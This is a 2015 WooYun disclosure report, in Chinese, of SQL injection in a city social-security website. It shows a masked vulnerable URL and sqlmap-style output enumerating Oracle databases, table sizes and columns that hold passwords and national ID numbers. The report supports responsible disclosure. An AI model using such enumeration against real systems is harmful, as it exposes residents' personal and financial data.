某市人力资源社会保障网存在SQL注射，造成数六十万信息外泄！！！

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0151576

漏洞标题：某市人力资源社会保障网存在SQL注射，造成数六十万信息外泄！！！

漏洞作者：路人甲

提交时间：2015-11-04 14:20

修复时间：2015-12-21 10:54

公开时间：2015-12-21 10:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-04：细节已通知厂商并且等待厂商处理中
2015-11-06：厂商已经确认，细节仅向厂商公开
2015-11-16：细节向核心白帽子及相关领域专家公开
2015-11-26：细节向普通白帽子公开
2015-12-06：细节向实习白帽子公开
2015-12-21：细节向公众公开

简要描述：

英文真心看不懂。。

详细说明：

http://**.**.**.**/html/bszn/subtypelist.jsp?subid=12&typeid=4

back-end DBMS: Oracle
available databases [16]:
[*] CTXSYS
[*] CZSBWEB
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB

跑的实在慢，跑了一个库

漏洞证明：

Database: CZSBWEB
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| V_JF_SJJFYS1    | 51554442 |
| V_GRJFGZ        | 43999802 |
| V_JF_GRYJSJXX   | 39933304 |
| V_JF_JFHDTZ     | 7815264 |
| V_ZHXX          | 4859708 |
| V_DY_DYHDB      | 3205608 |
| V_TXDY1         | 1936714 |
| CC_BX_USER      | 561362  |
| V_DA_GRJBXX1    | 509802  |
| V_DA_GRCBXX1    | 509777  |
| V_DA_GRJBXX     | 460896  |
| V_DA_GRCBXX     | 460884  |
| V_DY_TXZGBCXX1  | 148207  |
| V_DY_TXZGBCXX   | 127435  |
| V_TXDY          | 125760  |
| V_TZDY          | 115388  |
| CC_ADDONARTICLE | 25263   |
| CC_ARTICLES     | 20810   |
| V_DA_DWXX001    | 6965    |
| V_DA_DWXX00     | 6091    |
| V_BM_TXDYBM     | 381     |
Database: CZSBWEB
Table: CC_BX_USER
[5 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| PWD       | VARCHAR2 |
| SHENFENID | VARCHAR2 |
| USERID    | NUMBER   |
| YANGLAOID | VARCHAR2 |
| YILIAOID  | VARCHAR2 |
+-----------+----------+
密码，身份证id ，userid，养老id，医疗id

Database: CZSBWEB
Table: V_GRJFGZ
[8 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| DWHZBL | NUMBER   |
| DWJFBL | NUMBER   |
| GRBH00 | VARCHAR2 |
| GRGZ00 | NUMBER   |
| GRJFBL | NUMBER   |
| GZSSNY | VARCHAR2 |
| IDA    | ROWID    |
| JFJS00 | NUMBER   |
+--------+----------+
Database: CZSBWEB
Table: V_JF_GRYJSJXX
[8 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| DWHZJE | NUMBER   |
| DWYJJE | NUMBER   |
| GRBH00 | VARCHAR2 |
| GRYJJE | NUMBER   |
| IDA    | ROWID    |
| JFJS00 | NUMBER   |
| JZLSH  | VARCHAR2 |
| YJNY00 | VARCHAR2 |
Table: V_ZHXX
[7 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| DWJFYS | NUMBER   |
| GRBH00 | VARCHAR2 |
| GRJFYS | NUMBER   |
| HJ     | NUMBER   |
| IDA    | ROWID    |
| JFJS   | NUMBER   |
| YSNIAN | VARCHAR2 |
看不懂英文简写。。跑的话又好慢。。。

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-11-06 10:53

厂商回复：

CNVD确认并复现所述漏洞情况，已经转由CNCERT下发对应分中心，由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0151576

漏洞标题：某市人力资源社会保障网存在SQL注射，造成数六十万信息外泄！！！

相关厂商：cncert国家互联网应急中心

漏洞作者：路人甲

提交时间：2015-11-04 14:20

修复时间：2015-12-21 10:54

公开时间：2015-12-21 10:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0151576

漏洞标题：某市人力资源社会保障网存在SQL注射，造成数六十万信息外泄！！！

相关厂商：cncert国家互联网应急中心

漏洞作者： 路人甲

提交时间：2015-11-04 14:20

修复时间：2015-12-21 10:54

公开时间：2015-12-21 10:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0151576"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云